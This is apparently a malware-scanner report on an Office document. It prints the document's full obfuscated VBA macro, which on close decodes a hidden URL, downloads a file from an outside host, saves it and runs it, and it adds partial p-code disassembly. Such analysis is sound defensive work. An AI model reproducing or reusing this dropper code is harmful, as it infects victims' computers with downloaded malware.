MALICIOUS
Risk Score: 242

Heuristics (7)

- VBA macros detected (medium, 3 related findings): OLE_VBA_MACROS. Document contains VBA macro code.
- WScript.Shell usage (critical): OLE_VBA_WSCRIPT. WScript.Shell usage. Matched line in script:
  Set WshShell = CreateObject("WScript.Shell")
- VBA downloads and writes a file to disk (critical): OLE_VBA_HTTP_DROP_EXEC. VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script:
  °©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹ = ½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª.responseBody
- CreateObject call (high): OLE_VBA_CREATEOBJ. CreateObject call. Matched line in script:
  Set WshShell = CreateObject("WScript.Shell")
- Reference to Windows Script Host (high): SC_STR_WSCRIPT. Reference to Windows Script Host.
- Macro/content-enable lure (medium): SE_ENABLE_LURE. Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings.
- Embedded URL (info): EMBEDDED_URL. One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (Referenced by macro)

Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24355 bytes |

SHA-256: cac2db46523a6c652c66ced50f4410f6b39c7be6c990c6acd3138c98e62cb3d2

Preview script: first 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
Dim °©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤ As Integer
°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤ = Chr(50) + Chr(48) + Chr(48)
Dim WshShell As Object
Dim bSpecialPathkjbksd As String
Set WshShell = CreateObject("WScript.Shell")
bSpecialPathkjbksd = WshShell.SpecialFolders("Templates")
Dim ©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼
Dim °©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹
Dim ¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º
Dim ¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯
Dim ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
Dim ©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ As Integer
Dim ½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª
Dim §º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶
©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ = 1
Set ½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª = CreateObject("microsoft.xmlhttp")
Set ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥ = CreateObject("Shell.Application")
¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯ = bSpecialPathkjbksd + º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥("\NM¶àãH.ÂÛÂ")
½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª.Open "get", º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥("hÖÖÓ://ÓÂÀÁÂzÒÅÂÃlÒw.ÜdÅÕ.ÂÙ/mbÄÅÄgbÀÂÖ/ÕwÒÅdbdb.ÂÛÂ"), False
½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª.send
°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹ = ½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª.responseBody
If ½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª.Status = 200 Then
Set ©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼ = CreateObject("adodb.stream")
©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼.Open
©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼.Type = ©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ
©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼.Write °©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹
©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼.SaveToFile ¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯, ©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ + ©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ
©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼.Close
End If
¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥.Open (¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯)
End Sub
Public Function º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥(«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´)
¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°» = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãä娶§Ú¥"
«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»² = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNضQR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
For i = 1 To Len(«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´)
¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿© = InStr(¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°», Mid(«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´, i, 1))
If ¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿© > 0 Then
²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨ = Mid(«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»², ¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©, 1)
¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ = ¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ + ²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨
Else
¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ = ¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ + Mid(«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´, i, 1)
End If
Next
º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥ = ¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££
End Function
' Processing file: /opt/analyzer/scan_staging/54addf95cc01449d864bb01faf8378b1.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4959 bytes
' Line #0:
' FuncDefn (Private Sub cSpecialPathjhbkvhj())
' Line #1:
' Dim
' VarDefn ¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯ (As Integer)
' Line #2:
' LitDI2 0x0032
' ArgsLd SpecialFolders 0x0001
' LitDI2 0x0030
' ArgsLd SpecialFolders 0x0001
' Add
' LitDI2 0x0030
' ArgsLd SpecialFolders 0x0001
' Add
' St ¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯
' Line #3:
' Dim
' VarDefn ¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½ (As Object)
' Line #4:
' Dim
' VarDefn id_034A (As String)
' Line #5:
' Line #6:
' SetStmt
' LitStr 0x000D "WScript.Shell"
' ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001
' Set ¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½
' Line #7:
' LitStr 0x0009 "Templates"
' Ld ¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½
' ArgsMemLd µ¼º°¸§§¹¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º 0x0001
' St id_034A
' Line #8:
' Dim
' VarDefn ¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥
' Line #9:
' Dim
' VarDefn ©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ
' Line #10:
' Dim
' VarDefn ½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª
' Line #11:
' Dim
' VarDefn §º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶
' Line #12:
' Dim
' VarDefn º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥
' Line #13:
' Dim
' VarDefn «¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´ (As Integer)
' Line #14:
' Dim
' VarDefn ¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»
' Line #15:
' Dim
' VarDefn «§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²
' Line #16:
' LitDI2 0x0001
' St «¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶¤³¶´ºª©³´º§¼¡¸¤°¼¯º¢¥¤¥¢«¿«·¨¾§¥£¨·§»²¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´
' Line #17:
' Line #18:
' Line #19:
' Line #20:
' Line #21:
' SetStmt
' LitStr 0x0011 "microsoft.xmlhttp"
' ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001
' Set ¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»
' Line #22:
' SetStmt
' LitStr 0x0011 "Shell.Application"
' ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001
' Set º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥
' Line #23:
' Line #24:
' Ld id_034A
' LitStr 0x000B "\NM¶àãH.ÂÛÂ"
' ArgsLd ¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿© 0x0001
' Add
' St §º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»«§¦¡¾»£¢®©³·°«¯¯¯¬º¾¬£½½¨¯®½£¾²°ª½¥«¾¨¢¬¬»»¤²¹¥·¦¸¬¥«®¾¦¨¶
' Line #25:
' LitStr 0x0003 "get"
' LitStr 0x0034 "hÖÖÓ://ÓÂÀÁÂzÒÅÂÃlÒw.ÜdÅÕ.ÂÙ/mbÄÅÄgbÀÂÖ/ÕwÒÅdbdb.ÂÛÂ"
' ArgsLd ¡§µ¡§²¸££ª¼¢»¬¤¯¥¬ªµ¢¤§´²¿£¼¿½ª©°½½«¦©¹®¢º©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿© 0x0001
' LitVarSpecial (False)
' Ld ¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»
' ArgsMemCall Open 0x0003
' Line #26:
' Ld ¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»
' ArgsMemCall ¨²¾·¼¥¨º»¡»¾«½°¶·¶¹¨¥¡®¥¦´¶¸³®¥©¼²´¿²µ¼º°¸§§¹¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸ 0x0000
' Line #27:
' Ld ¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»
' MemLd ¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½º´©¤£¤¢
' St ©¬¼¡¶¶µ¸¢¦¢¯¦§³µ·²¯¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ
' Line #28:
' Ld ¥ª¼°³¾°´»®¡·¡¨¸ªª¶¥¶£¡¿¡¶³½¼¦·©®¿©²º¨¿ª´°¬«¸«¨£©º¿¿¾®°µ¹¤´³¼¾¯»¥µ°©»¼§º½©«¹®²²®¨¡¿¤¿¢¹¦¹¯¼¨½¤®§¤¦°»
' MemLd ª¯ª¸¿¿¦¤¢§¸¯¼³¨¦¶¨¦³¹©¢©½¡¼»£®¤«©¶©£¦µ³¯¢½¹¶½¨²¾·¼¥¨º»¡»¾«½°¶·¶¹¨¥¡®¥¦´¶¸³®¥©¼²´¿²µ¼º°¸§§
' LitDI2 0x00C8
' Eq
' IfBlock
' Line #29:
' SetStmt
' LitStr 0x000C "adodb.stream"
